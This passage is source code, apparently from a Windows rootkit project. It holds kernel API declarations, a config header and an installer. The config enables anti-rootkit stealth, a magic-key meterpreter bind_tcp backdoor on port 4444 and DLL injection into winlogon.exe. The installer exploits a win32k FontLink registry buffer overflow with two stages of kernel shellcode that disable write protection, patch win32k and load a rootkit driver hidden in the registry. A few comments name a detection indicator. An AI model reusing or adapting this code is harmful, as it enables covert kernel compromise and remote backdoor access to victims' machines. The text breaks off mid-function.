UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD Threads[1]; } SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect ); NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PULONG FreeSize, ULONG FreeType ); NTSYSAPI NTSTATUS NTAPI ZwOpenThread( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId ); NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile( HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength ); NTSYSAPI NTSTATUS NTAPI ZwFsControlFile( HANDLE FileHandle, HANDLE Event OPTIONAL, PIO_APC_ROUTINE ApcRoutine OPTIONAL, PVOID ApcContext OPTIONAL, PIO_STATUS_BLOCK IoStatusBlock, ULONG FsControlCode, PVOID InputBuffer OPTIONAL, ULONG InputBufferLength, PVOID OutputBuffer OPTIONAL, ULONG OutputBufferLength ); NTSYSAPI NTSTATUS NTAPI ZwSaveKey( HANDLE KeyHandle, HANDLE FileHandle ); NTSYSAPI NTSTATUS NTAPI ZwQueryVolumeInformationFile( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FsInformation, ULONG Length, FS_INFORMATION_CLASS FsInformationClass ); NTSYSAPI NTSTATUS NTAPI ZwQuerySecurityObject( HANDLE Handle, 
SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor, ULONG Length, PULONG LengthNeeded ); NTSYSAPI NTSTATUS NTAPI ZwSetSecurityObject( HANDLE Handle, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor ); NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject( HANDLE SourceProcessHandle, HANDLE SourceHandle, HANDLE TargetProcessHandle, PHANDLE TargetHandle, ACCESS_MASK DesiredAccess, ULONG HandleAttributes, ULONG Options ); NTSYSAPI NTSTATUS NTAPI ZwCreateEvent( PHANDLE EventHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, EVENT_TYPE EventType, BOOLEAN InitialState ); NTSYSAPI NTSTATUS NTAPI ZwWaitForSingleObject( HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout ); NTSYSAPI NTSTATUS NTAPI RtlGetDaclSecurityDescriptor( PSECURITY_DESCRIPTOR SecurityDescriptor, PBOOLEAN DaclPresent, PACL *Dacl, PBOOLEAN DaclDefaulted ); #ifndef __wtypes_h__ typedef struct _SID_IDENTIFIER_AUTHORITY { UCHAR Value[ 6 ]; } SID_IDENTIFIER_AUTHORITY; typedef struct _SID_IDENTIFIER_AUTHORITY *PSID_IDENTIFIER_AUTHORITY; #endif NTSYSAPI NTSTATUS NTAPI RtlInitializeSid( PSID Sid, PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, UCHAR SubAuthorityCount ); NTSYSAPI ULONG NTAPI RtlLengthSid( PSID Sid ); NTSYSAPI NTSTATUS NTAPI RtlAddAccessAllowedAce( PACL Acl, ULONG AceRevision, ACCESS_MASK AccessMask, PSID Sid ); NTSYSAPI NTSTATUS NTAPI RtlSetDaclSecurityDescriptor( OUT PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN DaclPresent, PACL Dacl, BOOLEAN DaclDefaulted ); NTSYSAPI NTSTATUS NTAPI RtlSelfRelativeToAbsoluteSD2( PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor, PULONG pBufferSize ); NTSYSAPI BOOLEAN NTAPI RtlValidSid( PSID Sid ); typedef struct _KAPC_STATE { LIST_ENTRY ApcListHead[2]; PVOID Process; BOOLEAN KernelApcInProgress; BOOLEAN KernelApcPending; BOOLEAN UserApcPending; } KAPC_STATE, *PKAPC_STATE; NTSYSAPI VOID NTAPI KeStackAttachProcess( PEPROCESS Process, PKAPC_STATE ApcState ); NTSYSAPI VOID NTAPI 
KeUnstackDetachProcess( PKAPC_STATE ApcState ); NTSYSAPI NTSTATUS NTAPI PsLookupProcessByProcessId( HANDLE ProcessId, PEPROCESS *Process ); NTSYSAPI NTSTATUS NTAPI PsLookupThreadByThreadId( HANDLE ThreadId, PETHREAD *Thread ); NTSYSAPI NTSTATUS NTAPI ObOpenObjectByPointer( PVOID Object, ULONG HandleAttributes, PACCESS_STATE PassedAccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PHANDLE Handle ); NTSYSAPI NTSTATUS NTAPI ObOpenObjectByName( POBJECT_ATTRIBUTES ObjectAttributes, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess, PVOID ParseContext, PHANDLE Handle ); NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName( PUNICODE_STRING ObjectPath, ULONG Attributes, PACCESS_STATE PassedAccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID ParseContext, PVOID *ObjectPtr ); NTKERNELAPI NTSTATUS ObQueryNameString( PVOID Object, POBJECT_NAME_INFORMATION ObjectNameInfo, ULONG Length, PULONG ReturnLength ); NTKERNELAPI VOID KeSetSystemAffinityThread( KAFFINITY Affinity ); typedef enum { OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment } KAPC_ENVIRONMENT; NTKERNELAPI VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ApcMode, PVOID NormalContext ); NTKERNELAPI BOOLEAN KeInsertQueueApc( PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment ); ================================================ FILE: src/rootkit_driver_config.h ================================================ /** * Hide rootkit executable memory in discardable sections to avoid * 'hiiden code' detection from different anti-rootkits. */ #define USE_STEALTH_IMAGE /** * Magic sequence that activates meterpreter/bind_tcp backdoor on 4444 port. 
* Use rootkit_ping.py script for communicating with the infected target. */ #define ROOTKIT_CTL_KEY "7C5E3380" /** * Process to inject meterpreter DLL. */ #define METERPRETER_PROCESS L"winlogon.exe" ================================================ FILE: src/rootkit_installer/rootkit_installer.cpp ================================================ #include "stdafx.h" #define EMIT(_data_) __asm __emit _data_ #define _ __asm __emit #define ENDM 'DNE~' #ifdef USE_DEBUG_DRIVER #include "../includes/rootkit_driver_debug.sys.h" #else #include "../includes/rootkit_driver.sys.h" #endif // buffer lengt and return address offset #define BOF_MIN_LENGTH (0x05 * sizeof(PVOID)) #define BOF_RET_OFFSET (BOF_MIN_LENGTH - sizeof(PVOID)) // registry key and value name for malformed exploit data + 1-st shellcode #define EXPL_KEY "Software\\Microsoft\\Windows NT\\CurrentVersion\\FontLink" #define EXPL_VAL "FontLinkDefaultChar" #define SC2_KEY "System\\CurrentControlSet\\Control" #define SC2_VAL "Configuration Data" /** * Name of registry value in System\CurrentControlSet\Control, to store * rootkit driver image. */ #define DRV_VAL "PCI" // Define the page size for the Intel 386 as 4096 (0x1000). #define PAGE_SIZE 0x1000 /** * OS sensitive addresses and offsets. */ // magic address of JMP ESP for Windows 7 SP0-SP1 #define JMP_ESP_ADDR 0xffdf04c7 // offset of _KPCR::KdVersionBlock #define KPCR_KdVersionBlock 0x34 #define KPCR_SelfPcr 0x1c #define PROCESSINFO_Flags 0x08 #define WIN32_PROCESS_FLAGS 0x20040010 /** * Virtual address inside of %SystemRoot%\Config\SYSTEM registry * hive, that mapped into the kernel memory. 
*/
// Start address for the 1-st stage shellcode's memory scan (Shellcode_1 loads it
// into ESI and walks forward in 0x10-byte steps).
#define REG_HIVE_ADDRESS 0x8d100000

// Signature that marks the 2-nd stage inside the registry value data.
// Shellcode_1 compares a DWORD against REG_SIGN_1 and the following byte
// against 0x90; _tmain() copies REG_SIGN_FULL into the buffer it stores in
// SC2_KEY\SC2_VAL.
// Detection note: the byte run 40 50 41 51 90 repeated at 16-byte-spaced
// offsets in the "Configuration Data" value under
// HKLM\System\CurrentControlSet\Control is therefore an indicator of this PoC.
#define REG_SIGN_1 '\x40\x50\x41\x51'
#define REG_SIGN_FULL "\x40\x50\x41\x51\x90"

// When FALSE, _tmain() replaces a leading 0xcc (int 3) byte of each shellcode
// copy with 0x90. Initialised to TRUE here; the --dbgbreaks option also sets TRUE.
BOOL m_DebugBreaks = TRUE;
//--------------------------------------------------------------------------------------
/**
 * Enable one privilege in the access token of the current process.
 *
 * lpszName - privilege name passed to LookupPrivilegeValueA()
 *            (_tmain() passes SE_SHUTDOWN_NAME before ExitWindowsEx()).
 *
 * Returns TRUE when OpenProcessToken(), LookupPrivilegeValueA() and
 * AdjustTokenPrivileges() all report success, FALSE otherwise. The token
 * handle is closed on every path.
 */
BOOL LoadPrivileges(char *lpszName)
{
    HANDLE hToken = NULL;
    LUID Val;
    TOKEN_PRIVILEGES tp;
    BOOL bRet = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        DbgMsg(__FILE__, __LINE__, "OpenProcessToken() fails: error %d\n", GetLastError());
        goto end;
    }

    // translate the privilege name into the LUID used by the token APIs
    if (!LookupPrivilegeValueA(NULL, lpszName, &Val))
    {
        DbgMsg(__FILE__, __LINE__, "LookupPrivilegeValue() fails: error %d\n", GetLastError());
        goto end;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = Val;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // NOTE(review): AdjustTokenPrivileges() can return nonzero while
    // GetLastError() reports ERROR_NOT_ALL_ASSIGNED, so TRUE from this helper
    // means the call succeeded, not that the privilege is actually held.
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof (tp), NULL, NULL))
    {
        DbgMsg(__FILE__, __LINE__, "AdjustTokenPrivileges() fails: error %d\n", GetLastError());
        goto end;
    }

    bRet = TRUE;

end:
    // single cleanup point for all exits above
    if (hToken)
    {
        CloseHandle(hToken);
    }

    return bRet;
}
//--------------------------------------------------------------------------------------
/**
 * Query one system information class into a heap buffer, growing the buffer
 * until it fits.
 *
 * InfoClass - class passed through to NtQuerySystemInformation()
 *             (KernelGetModuleBase() passes SystemModuleInformation to read
 *             the loaded kernel module list from user mode).
 *
 * Returns a LocalAlloc() buffer that the caller releases with LocalFree(),
 * or NULL when allocation or the query fails.
 */
PVOID GetSysInf(SYSTEM_INFORMATION_CLASS InfoClass)
{
    NTSTATUS ns = 0;
    ULONG RetSize = 0, Size = 0x100;
    PVOID Info = NULL;

    // GET_NATIVE is defined elsewhere; the call below uses
    // f_NtQuerySystemInformation, so the macro presumably declares and
    // resolves that pointer -- confirm against its definition.
    GET_NATIVE(NtQuerySystemInformation);

    while (true)
    {
        // allocate memory for system information
        if ((Info = LocalAlloc(LMEM_FIXED | LMEM_ZEROINIT, Size)) == NULL)
        {
            DbgMsg(__FILE__, __LINE__, "LocalAlloc() fails\n");
            return NULL;
        }

        // query information
        RetSize = 0;
        ns = f_NtQuerySystemInformation(InfoClass, Info, Size, &RetSize);
        if (ns == STATUS_INFO_LENGTH_MISMATCH)
        {
            // buffer is too small
            LocalFree(Info);
            Info = NULL;

            if (RetSize > 0)
            {
                // allocate more memory and try again
                Size = RetSize + 0x100;
            }
            else
            {
                // no size hint was returned: give up; ns still holds the
                // mismatch status, so the failure path below returns NULL
                break;
            }
        }
        else
        {
            // success or a different error: leave the retry loop
            break;
        }
    }

    if (!NT_SUCCESS(ns))
    {
        DbgMsg(__FILE__, __LINE__, "NtQuerySystemInformation() fails; status: 0x%.8x\n", ns);

        // Info is already NULL after a length mismatch, non-NULL after other errors
        if (Info)
        {
            LocalFree(Info);
        }

        return NULL;
    }

    return Info;
}
//-------------------------------------------------------------------------------------- PVOID KernelGetModuleBase(char *ModuleName, char *ModulePath, SIZE_T ModulePathLen) { PVOID pModuleBase = NULL; UNICODE_STRING usCommonHalName, usCommonNtName; GET_NATIVE(RtlInitUnicodeString); GET_NATIVE(RtlAnsiStringToUnicodeString); GET_NATIVE(RtlInitAnsiString); GET_NATIVE(RtlEqualUnicodeString); GET_NATIVE(RtlFreeUnicodeString); f_RtlInitUnicodeString(&usCommonHalName, L"hal.dll"); f_RtlInitUnicodeString(&usCommonNtName, L"ntoskrnl.exe"); #define HAL_NAMES_NUM 6 wchar_t *wcHalNames[] = { L"hal.dll", // Non-ACPI PIC HAL L"halacpi.dll", // ACPI PIC HAL L"halapic.dll", // Non-ACPI APIC UP HAL L"halmps.dll", // Non-ACPI APIC MP HAL L"halaacpi.dll", // ACPI APIC UP HAL L"halmacpi.dll" // ACPI APIC MP HAL }; #define NT_NAMES_NUM 4 wchar_t *wcNtNames[] = { L"ntoskrnl.exe", // UP L"ntkrnlpa.exe", // UP PAE L"ntkrnlmp.exe", // MP L"ntkrpamp.exe" // MP PAE }; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)GetSysInf(SystemModuleInformation); if (Info) { ANSI_STRING asModuleName; UNICODE_STRING usModuleName; f_RtlInitAnsiString(&asModuleName, ModuleName); NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE); if (NT_SUCCESS(ns)) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { ANSI_STRING asEnumModuleName; UNICODE_STRING usEnumModuleName; f_RtlInitAnsiString( &asEnumModuleName, (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName ); NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE); if (NT_SUCCESS(ns)) { if (f_RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE)) { // hal.dll passed as module name for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++) { UNICODE_STRING usHalName; f_RtlInitUnicodeString(&usHalName, wcHalNames[i_m]); // compare module name from list with known HAL module name if (f_RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE)) { lstrcpyn(ModulePath, 
asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (f_RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE)) { // ntoskrnl.exe passed as module name for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++) { UNICODE_STRING usNtName; f_RtlInitUnicodeString(&usNtName, wcNtNames[i_m]); // compare module name from list with known kernel module name if (f_RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE)) { lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (f_RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE)) { lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen); pModuleBase = (PVOID)Info->Modules[i].ImageBase; } f_RtlFreeUnicodeString(&usEnumModuleName); if (pModuleBase) { // module is found break; } } } f_RtlFreeUnicodeString(&usModuleName); } LocalFree(Info); } return pModuleBase; } //-------------------------------------------------------------------------------------- #define GetKernelProcAddr(_proc_) GetKernelProcAddrEx("ntoskrnl.exe", (_proc_), FALSE) #define GetHalProcAddr(_proc_) GetKernelProcAddrEx("hal.dll", (_proc_), FALSE) #define GetKernelProcOffset(_proc_) GetKernelProcAddrEx("ntoskrnl.exe", (_proc_), TRUE) #define GetHalProcOffset(_proc_) GetKernelProcAddrEx("hal.dll", (_proc_), TRUE) PVOID GetKernelProcAddrEx(char *lpszModuleName, char *lpszProcName, BOOL bOffset) { PVOID Addr = NULL; // get kernel module address and file path char szModulePath[MAX_PATH]; PVOID ModuleBase = KernelGetModuleBase(lpszModuleName, szModulePath, MAX_PATH); if (ModuleBase) { // load kernel image as dynamic library HMODULE hModule = LoadLibraryExA(szModulePath, 0, DONT_RESOLVE_DLL_REFERENCES); if (hModule) { // get address of target function Addr = GetProcAddress(hModule, lpszProcName); if (Addr) { if (bOffset) { // calculate only function offsset Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule); } else 
{ // calculate REAL address of this function Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule + (PUCHAR)ModuleBase); } } else { DbgMsg(__FILE__, __LINE__, "GetProcAddress() ERROR %d\n", GetLastError()); } FreeLibrary(hModule); } else { DbgMsg(__FILE__, __LINE__, "LoadLibraryEx() ERROR %d\n", GetLastError()); } } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Unable to locate \"%s\" module\n", lpszModuleName); } return Addr; } //-------------------------------------------------------------------------------------- #define marker_MmIsAddressValid 'Val0' __declspec(naked) void Shellcode_1(void) { __asm { /** * 1-st STAGE SHELLCODE BEGIN * * EBX allways points to the win32k!NtUserInitialize() * */ #ifdef USE_SHELLCODE_DEBUGBREAK int 3 #endif /** * Find kernel adderss */ mov eax, fs:[KPCR_SelfPcr] mov edi, dword ptr [eax + KPCR_KdVersionBlock] xor di, di _find_kernel: cmp word ptr [edi], IMAGE_DOS_SIGNATURE je _kernel_ok sub edi, PAGE_SIZE jmp short _find_kernel _kernel_ok: // get address of nt!MmIsAddressvalid() add edi, marker_MmIsAddressValid /** * Find 2-nd shellcode, that has been stored in registry hive, * in kernel memory. */ mov esi, REG_HIVE_ADDRESS _loop: // check for valid address push esi call edi test al, al jz _no_match /** * Check signature by 8 bytes */ cmp dword ptr [esi], REG_SIGN_1 jne _no_match cmp byte ptr [esi + 4], 0x90 jne _no_match // signature matched! 
jmp esi _no_match: add esi, 0x10 jmp short _loop } // end marker EMIT('~' _ 'E' _ 'N' _ 'D') } //-------------------------------------------------------------------------------------- /** * Constants and flags for RtlQueryRegistryValues() */ // RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED #define QUERY_REGISTRY_TABLE_FLAGS 0x00000024 // RTL_REGISTRY_CONTROL | RTL_REGISTRY_OPTIONAL #define QUERY_REGISTRY_RELATIVETO 0x80000002 #define QUERY_REGISTRY_TABLE_SIZE 0x38 __declspec(naked) void Shellcode_2(void) { __asm { /** * 2-nd STAGE SHELLCODE BEGIN * * EBX - win32k!NtUserInitialize() * EDI - nt!MmIsAddressValid() * */ #ifdef USE_SHELLCODE_DEBUGBREAK int 3 #endif /** * Calculate shellcode address. */ mov esi, ebx call _realloc _realloc: pop ebx sub ebx, _realloc /** * Find win32k address */ xor si, si _find_win32: cmp word ptr [esi], IMAGE_DOS_SIGNATURE je _win32_ok sub esi, PAGE_SIZE jmp short _find_win32 _win32_ok: mov [ebx + _params + _win32k_base], esi // get kernel image start addreess mov ecx, [ebx + _params + _MmIsAddressValid] sub edi, ecx mov [ebx + _params + _kernel_base], edi /** * Patch win32k!bInitializeEUDC() to prevent * multipile vulnerability triggering. 
*/ mov ecx, [ebx + _params + _bInitializeEUDC_patch] add ecx, esi // disable memory write protection mov eax, cr0 and eax, not 000010000h mov cr0, eax // perform patching with add esp, 0x14 / nop mov word ptr [ecx + 0], '\x83\xc4' mov word ptr [ecx + 2], '\x14\x90' // enable memory write protection which was supposed to do mov eax, cr0 or eax, 000010000h mov cr0, eax /**************************************************** * Place any payload here: */ mov edx, [ebx + _params + _rootkit_size] add edx, 0x100 mov ecx, [ebx + _params + _ExAllocatePool] add ecx, edi // call nt!ExAllocatePool() and allocate memory for rootkit image push edx push edx push 0 call ecx pop edx test eax, eax jz _err_payload /* RtlQueryRegistryValues() remark: The buffer pointed to by EntryContext must begin with a signed LONG value. The magnitude of the value must specify the size, in bytes, of the buffer. */ neg edx mov [eax], edx mov ebp, eax /* RTL_QUERY_REGISTRY_TABLE (0x1c bytes): +00 QueryRoutine +04 Flags +08 Name +0c EntryContext +10 DefaultType +14 DefaultData +18 DefaultLength */ // allocate memory for RTL_QUERY_REGISTRY_TABLE[2] mov edx, esp mov ecx, QUERY_REGISTRY_TABLE_SIZE sub esp, ecx // fill with zero bytes push edx xchg edi, edx xor eax, eax rep stosb xchg edi, edx pop edx // filling the structure mov dword ptr [edx + 0x04], QUERY_REGISTRY_TABLE_FLAGS lea eax, [ebx + _drv_val_name] mov [edx + 0x08], eax mov [edx + 0x0c], ebp push 0 push 0 push edx push 0 push QUERY_REGISTRY_RELATIVETO // call nt!RtlQueryRegistryValues() mov ecx, [ebx + _params + _RtlQueryRegistryValues] add ecx, edi call ecx add esp, QUERY_REGISTRY_TABLE_SIZE test eax, eax jnz _err_payload // check for DOS signature of readed data cmp word ptr [ebp], IMAGE_DOS_SIGNATURE jne _err_payload mov [ebx + _params + _rootkit_base], ebp mov ecx, ebp add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew mov ecx, [ecx + 0x28] // IMAGE_OPTIONAL_HEADER::AddressOfEntryPoint add ecx, ebp // call image entry point lea eax, [ebx + 
_params] push eax // RegistryPath argument push 0 // DriverObject argument call ecx _err_payload: #ifdef USE_SHELLCODE_DBGPRINT lea ecx, [ebx + _params + _szDbgPrintMessage] push ecx // call nt!DbgPrint() mov ecx, [ebx + _params + _DbgPrint] add ecx, edi call ecx pop eax #endif /****************************************************/ /** * Make the rest of the stuff that had to be made * by the win32k!NtUserInitialize() */ // get current process mov ecx, [ebx + _params + _PsGetCurrentProcess] add ecx, edi call ecx // set flags in PROCESSINFO mov ecx, [ebx + _params + _PsGetProcessWin32Process] add ecx, edi push eax call ecx add eax, 8 or dword ptr [eax], WIN32_PROCESS_FLAGS // call win32k!UserInitialize() mov ecx, [ebx + _params + _UserInitialize] add ecx, esi call ecx /** * Return back to the nt!_KiFastCallEntry() * with STATUS_SUCCESS. */ // get kernel image end addreess mov ecx, edi add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew mov ecx, [ecx + 0x50] // IMAGE_OPTIONAL_HEADER::SizeOfImage add ecx, edi // get kernel image start addreess mov ebp, [ebx + _params + _MmIsAddressValid] add ebp, edi _find_ki_ret: // Lookup for nt!_KiFastCallEntry()+XX and EBP value in stack. mov ebx, edx pop edx // check for the kernel pointer cmp edx, edi jb _find_ki_ret cmp edx, ecx ja _find_ki_ret pushad // check for valid address push edx call ebp test al, al popad jz _find_ki_ret /* Check for the instruction, at return address from the system service: call ebx ; system service call test byte ptr [ebp+6Ch], 1 ; returns here jz short loc_4357D4 ... 
*/ cmp word ptr [edx], '\xf6\x45' jne _find_ki_ret // return to the nt!_KiFastCallEntry() with STATUS_SUCCESS xor eax, eax mov ebp, ebx jmp edx _drv_val_name: EMIT('P' _ '\x0' _ 'C' _ '\x0' _ 'I' _ '\x0' _ '\x0' _ '\x0') _params: /** * Shellcode constants, see SC_PARAMS struct above */ } // end marker EMIT('~' _ 'E' _ 'N' _ 'D') } //-------------------------------------------------------------------------------------- DWORD ScGetSize(PDWORD pData) { DWORD dwSize = 0; PDWORD Ptr = pData; // get size of code while (*Ptr != ENDM) { dwSize++; // check for the end marker Ptr = (PDWORD)((DWORD)Ptr + 1); } return dwSize; } //-------------------------------------------------------------------------------------- BOOL ScWriteDword(PVOID pData, DWORD dwSize, DWORD dwMarker, DWORD dwValue) { // find value pisition in bytes buffer by marker for (DWORD i = 0; i < dwSize - sizeof(DWORD); i++) { if (*(PDWORD)((PUCHAR)pData + i) == dwMarker) { // replace marker with the value *(PDWORD)((PUCHAR)pData + i) = dwValue; return TRUE; } } return FALSE; } //-------------------------------------------------------------------------------------- /** * Constants for win32k.sys image analysis. 
*/ #define WIN32K_STR_1 L"\\Windows\\WindowStations" #define WIN32K_STR_2 L"FontLinkDefaultChar" #define WIN32K_STDCALL_PROLOG "\x8b\xff\x55\x8b\xec" #define WIN32K_STDCALL_PROLOG_LEN 5 BOOL AnalyseWin32k(PDWORD poffset_UserInitialize, PDWORD poffset_bInitializeEUDC_patch) { DWORD offset_UserInitialize = 0; DWORD offset_bInitializeEUDC_patch = 0; char szPath[MAX_PATH]; GetSystemDirectory(szPath, MAX_PATH); strcat_s(szPath, MAX_PATH, "\\win32k.sys"); HMODULE hMod = LoadLibraryEx(szPath, NULL, DONT_RESOLVE_DLL_REFERENCES); if (hMod) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew); PIMAGE_SECTION_HEADER pSection = NULL, pCodeSection = NULL; PIMAGE_BASE_RELOCATION pRelocation = NULL; ULONG RelocationSize = 0, NumberOfSections = 0; ULONGLONG OldBase = 0; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA( hMod, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress ); RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = (ULONGLONG)pHeaders32->OptionalHeader.ImageBase; NumberOfSections = pHeaders32->FileHeader.NumberOfSections; pSection = (PIMAGE_SECTION_HEADER) (pHeaders32->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders32->OptionalHeader); } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA( hMod, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress ); RelocationSize = 
pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders64->OptionalHeader.ImageBase; NumberOfSections = pHeaders64->FileHeader.NumberOfSections; pSection = (PIMAGE_SECTION_HEADER) (pHeaders64->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders64->OptionalHeader); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"() ERROR: Unkown machine type\n"); FreeLibrary(hMod); return FALSE; } // enumerate image sections for (ULONG i = 0; i < NumberOfSections; i++) { // find section, that contains global variable if (!strncmp((char *)&pSection->Name, ".text", 5)) { pCodeSection = pSection; break; } pSection += 1; } if (pRelocation && pCodeSection) { // parse image relocation table ULONG Size = 0; while (RelocationSize > Size && pRelocation->SizeOfBlock) { ULONG Number = (pRelocation->SizeOfBlock - 8) / 2; PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); for (ULONG i = 0; i < Number; i++) { if (Rel[i] > 0) { USHORT Type = (Rel[i] & 0xF000) >> 12; ULONG Rva = 0; PVOID *Va = NULL; // get address of global variable that used by our instruction if (Type == IMAGE_REL_BASED_HIGHLOW || Type == IMAGE_REL_BASED_DIR64) { Rva = pRelocation->VirtualAddress + (Rel[i] & 0x0FFF); Va = (PVOID *)RVATOVA(hMod, Rva); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__ "() ERROR: Unknown relocation type (%d)\n", Type); } if (Va && Rva > 0 && Rva > pCodeSection->VirtualAddress && Rva < pCodeSection->VirtualAddress + pCodeSection->Misc.VirtualSize) { // get address of global variable, that requre fixup PVOID VarAddr = *Va; VarAddr = (PVOID)((ULONGLONG)VarAddr - OldBase + (PUCHAR)hMod); if (!IsBadStringPtrW((LPWSTR)VarAddr, MAX_PATH)) { if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_1)) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): \"%ws\" referenced at offset 0x%.8x\n", WIN32K_STR_1, Rva ); // lookup for stdcall prolog of win32k!UserInitialize() for (DWORD i = 0; i < 50; i++) { if (!memcmp( (PUCHAR)Va - i, WIN32K_STDCALL_PROLOG, WIN32K_STDCALL_PROLOG_LEN)) { if 
